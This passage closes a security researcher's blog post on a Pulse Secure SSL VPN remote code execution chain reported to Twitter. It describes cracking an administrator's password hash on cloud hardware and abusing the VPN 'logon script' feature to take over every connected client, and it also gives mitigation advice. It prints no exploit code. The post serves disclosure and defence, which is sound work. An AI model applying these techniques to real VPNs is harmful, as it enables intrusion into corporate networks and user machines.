<p>We launched a 72 core AWS to crack that.  </p>
<p><img src="/posts/2019-09-attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain/b6c43ba1094b2d2e-08.png"></p>
<p>We cracked the hash and got the RCE successfully! I think we are lucky because from our observation, there is a very strong password policy on Twitter staffs. But it seems the policy is not applied to the manager. The manager’s password length is only ten, and the first character is <strong>B</strong>. It’s at a very early stage of our cracking queue so that we can crack the hash in 3 hours.  </p>
<p>We reported all of our findings to Twitter and got the highest bounty from them. Although we can not prove that, it seems this is the first remote code execution on Twitter! If you are interested in the full report, you can check the <a target="_blank" rel="noopener" href="https://hackerone.com/reports/591295">HackerOne link</a> for more details.  </p>
<h1 id="Recommendations"><a href="#Recommendations" class="headerlink" title="Recommendations"></a>Recommendations</h1><p>How to mitigate such attacks? Here we give several recommendations.  </p>
<p>The first is the Client-Side Certificate. It’s also the most effective method. Without a valid certificate, the malicious connection will be dropped during SSL negotiation! The second is the Multi-factor Authentication. Although we break the Twitter 2FA this time, with a proper setting, the MFA can still decrease numerous attack surface. Next, enable the full log audit and remember to send to an out-bound log server.  </p>
<p>Also, perform your corporate asset inventory regularly and subscribe to the vendor’s security advisory. The most important of all, always keep your system updated!  </p>
<h1 id="Bonus-Take-over-all-the-VPN-clients"><a href="#Bonus-Take-over-all-the-VPN-clients" class="headerlink" title="Bonus: Take over all the VPN clients"></a>Bonus: Take over all the VPN clients</h1><p>Our company, <a target="_blank" rel="noopener" href="https://devco.re/">DEVCORE</a>, provides the most professional red team service in Asia. In this bonus part, let’s talk about how to make the red team more <strong>RED</strong>!  </p>
<p>We always know that in a red team operation, the personal computer is more valuable! There are several old-school methods to compromise the VPN clients through SSL VPN before, such as the water-hole attack and replacing the VPN agent.  </p>
<p>During our research, we found a new attack vector to take over all the clients. It’s the “<strong>logon script</strong>“ feature. It appears in almost EVERY SSL VPNs, such as OpenVPN, Fortinet, Pulse Secure… and more. It can execute corresponding scripts to mount the network file-system or change the routing table once the VPN connection established.  </p>
<p>Due to this “<strong>hacker-friendly</strong>“ feature, once we got the admin privilege, we can leverage this feature to infect all the VPN clients! Here we use the Pulse Secure as an example, and demonstrate how to not only compromise the SSL VPN but also take over all of your connected clients:  </p>
<iframe allowfullscreen="" height="315" src="https://www.youtube.com/embed/v7JUMb70ON4" width="560"></iframe>
  

<h1 id="Epilogue"><a href="#Epilogue" class="headerlink" title="Epilogue"></a>Epilogue</h1><p>OK, here is the end of this Attacking SSL VPN series! From our findings, SSL VPN is such a huge attack surface with few security researchers digging into. Apparently, it deserves more attention. We hope this kind of series can encourage other researchers to engage in this field and enhance the security of enterprises!  </p>
<p>Thanks to all guys we met, co-worked and cooperated. We will publish more innovative researches in the future :)  </p>

  </div>
</article>



        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2009-2024
    Orange Tsai
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/articles/">Articles</a></li><!--
     --><!--
       --><li><a href="/talks/">Talks</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

</body>
</html>
